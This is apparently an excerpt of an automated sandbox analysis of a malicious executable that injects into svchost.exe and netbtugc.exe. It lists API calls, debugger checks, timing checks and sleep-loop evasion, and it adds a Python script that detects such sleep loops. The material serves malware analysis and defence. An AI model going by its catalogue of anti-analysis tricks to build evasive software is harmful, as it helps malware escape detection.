            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
Source: Certificate 11-21AIS.exe | Static PE information: Data directories: IMAGE_DIRECTORY_ENTRY_IMPORT is in .rdata; IMAGE_DIRECTORY_ENTRY_RESOURCE is in .rsrc; IMAGE_DIRECTORY_ENTRY_BASERELOC is in .reloc; IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in .rdata; IMAGE_DIRECTORY_ENTRY_IAT is in .rdata
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008DE01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008EC09E push esi; ret (0_2_008EC0A0)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008EC187 push edi; ret (0_2_008EC189)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0092C8BC push esi; ret (0_2_0092C8BE)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008E6B05 push ecx; ret (0_2_008E6B18)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090B2B1 push FFFFFF8Bh; iretd (0_2_0090B2B3)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008EBDAA push edi; ret (0_2_008EBDAC)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008EBEC3 push esi; ret (0_2_008EBEC5)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004048A9 push esp; ret (1_2_004048AA)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E2BA push 00000038h; iretd (1_2_0041E2BE)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A436 push ebx; iretd (1_2_0041A600)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418C92 pushad; retf (1_2_00418C93)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A5D9 push ebx; iretd (1_2_0041A600)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004017E5 push ebp; retf 003Fh (1_2_004017E6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403780 push eax; ret (1_2_00403782)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004147A2 push es; iretd (1_2_004147AA)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0370225F pushad; ret (1_2_037027F9)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037027FA pushad; ret (1_2_037027F9)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx (1_2_037309B6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0370283D push eax; iretd (1_2_03702858)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0358225F pushad; ret (3_2_035827F9)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_035827FA pushad; ret (3_2_035827F9)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_035B09AD push ecx; mov dword ptr [esp], ecx (3_2_035B09B6)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0358283D push eax; iretd (3_2_03582858)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0358135E push eax; iretd (3_2_03581369)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BC0CE1 pushfd; retf (3_2_02BC0D0B)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BB2238 pushad; iretd (3_2_02BB2239)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BBAB37 push 00000038h; iretd (3_2_02BBAB3B)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BB6E56 push ebx; iretd (3_2_02BB6E7D)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BB6CB3 push ebx; iretd (3_2_02BB6E7D)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BBD1B0 push es; ret (3_2_02BBD1D0)
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BA1126 push esp; ret (3_2_02BA1127)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00928111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008E123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress (GetProcAddress repeated 30 times)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Process information set: NOOPENFILEERRORBOX (reported twice)
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported five times)

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | API/Special instruction interceptor: Address: 11B5E74
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0377096E rdtsc
Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 2618
Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 7353
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Evaded block: after key decision (graph_0-93450)
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.6 %
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep count: 2618 > 30
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep time: -5236000s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep count: 7353 > 30
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep time: -14706000s >= -30000s
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336 | Thread sleep time: -75000s >= -30000s
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336 | Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed (reported twice)
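The thread-delay rows above are the raw material of the "Malware Analysis System Evasion" verdict: TID 6444 of netbtugc.exe is sampled twice, at 2618 and then 7353 sleeps totalling 5236000 and 14706000 units, which is exactly 2000 units per call both times, the shape of a fixed Sleep in a loop; TID 3336 of the Program Files (x86) process shows 36 sleeps totalling 36000 units. The Python below is an added example written for this page, not Joe Sandbox code. It pairs each "Thread sleep time" row with the preceding "Thread sleep count" row of the same thread, computes the per-call interval and classifies each thread. Assumption: the signed sleep time is the accumulated relative delay in milliseconds (NtDelayExecution takes negative relative intervals), so its absolute value is the total; the 30-call and 30000-unit thresholds are the limits the rows themselves print. The patterns accept both the cleaned rows and the run-together extraction form ("TID: 6444Thread sleep count").

```python
"""Recover sleep-loop behaviour from 'Thread sleep count' / 'Thread sleep time' rows.

Added example for this report, not Joe Sandbox code.  Assumption: the signed
sleep time is the accumulated relative delay in milliseconds (NtDelayExecution
takes negative relative intervals), so its absolute value is the total delay.
Thresholds (30 calls, 30000 ms) mirror the limits printed in the rows.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Rows constructed from the report above, in report order.
SAMPLE_ROWS = [
    r'Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep count: 2618 > 30',
    r'Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep time: -5236000s >= -30000s',
    r'Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep count: 7353 > 30',
    r'Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444 | Thread sleep time: -14706000s >= -30000s',
    r'Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336 | Thread sleep time: -75000s >= -30000s',
    r'Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336 | Thread sleep count: 36 > 30',
    r'Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336 | Thread sleep time: -36000s >= -30000s',
]

# The optional "|" lets the same patterns match the run-together extraction form.
_HEAD = r'Source:\s*(?P<proc>.+?\.exe)\s+TID:\s*(?P<tid>\d+)\s*\|?\s*'
COUNT_RE = re.compile(_HEAD + r'Thread sleep count:\s*(?P<count>\d+)\s*>\s*\d+')
TIME_RE = re.compile(_HEAD + r'Thread sleep time:\s*(?P<total>-?\d+)s\s*>=\s*-?\d+s')


@dataclass
class SleepObservation:
    process: str
    tid: int
    calls: Optional[int]   # None when the report printed a total with no preceding count
    total_ms: int

    @property
    def per_call_ms(self) -> Optional[float]:
        return None if not self.calls else self.total_ms / self.calls


def parse_sleep_rows(rows):
    """Pair each 'sleep time' row with the latest 'sleep count' row of the same thread."""
    pending = {}
    out = []
    for row in rows:
        m = COUNT_RE.search(row)
        if m:
            pending[(m["proc"], int(m["tid"]))] = int(m["count"])
            continue
        m = TIME_RE.search(row)
        if m:
            key = (m["proc"], int(m["tid"]))
            out.append(SleepObservation(key[0], key[1], pending.pop(key, None), abs(int(m["total"]))))
    return out


def classify(observations, min_calls=30, min_total_ms=30000, tolerance=0.05):
    """One verdict per (process, tid).  Successive snapshots with the same per-call
    interval mean a fixed-interval loop; one snapshot over both limits is still a
    sleep loop; a bare total over the limit is a long delay."""
    by_thread = {}
    for o in observations:
        by_thread.setdefault((o.process, o.tid), []).append(o)
    verdicts = {}
    for key, obs in by_thread.items():
        intervals = [o.per_call_ms for o in obs if o.per_call_ms is not None]
        loops = [o for o in obs if o.calls is not None and o.calls > min_calls and o.total_ms >= min_total_ms]
        if len(intervals) >= 2 and max(intervals) - min(intervals) <= tolerance * max(intervals):
            verdicts[key] = "fixed_interval_sleep_loop"
        elif loops:
            verdicts[key] = "sleep_loop"
        elif any(o.total_ms >= min_total_ms for o in obs):
            verdicts[key] = "long_delay"
        else:
            verdicts[key] = "benign"
    return verdicts


if __name__ == "__main__":
    obs = parse_sleep_rows(SAMPLE_ROWS)
    for o in obs:
        print(f"tid {o.tid}: calls={o.calls} total={o.total_ms} ms per_call={o.per_call_ms}")
    for (proc, tid), verdict in classify(obs).items():
        print(f"{proc} tid {tid}: {verdict}")
```

The per-call interval is the useful number for a sandbox operator: a constant 2000-unit interval repeated thousands of times is what a time-skipping sandbox defeats by returning early from Sleep, and what the "threadDelayed" counter is measuring, whereas a single long delay is more cheaply handled by advancing the clock once.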
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BBBAB0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: firefox.exe, 00000008.00000002.2120116426.0000027A6484B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144253147.00000000013C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417823 LdrLoadDll,1_2_00417823
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00916AAF BlockInput,0_2_00916AAF
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C3D19
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_008F3920
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DE01E LoadLibraryA,GetProcAddress,0_2_008DE01E
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B6140 mov eax, dword ptr fs:[00000030h]0_2_011B6140
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B60E0 mov eax, dword ptr fs:[00000030h]0_2_011B60E0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B4AF0 mov eax, dword ptr fs:[00000030h]0_2_011B4AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]1_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]1_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]1_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]1_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]1_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]1_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]1_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov ecx, dword ptr fs:[00000030h]1_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]1_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]1_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h]1_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h]1_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380634F mov eax, dword ptr fs:[00000030h]1_2_0380634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372826B mov eax, dword ptr fs:[00000030h]1_2_0372826B
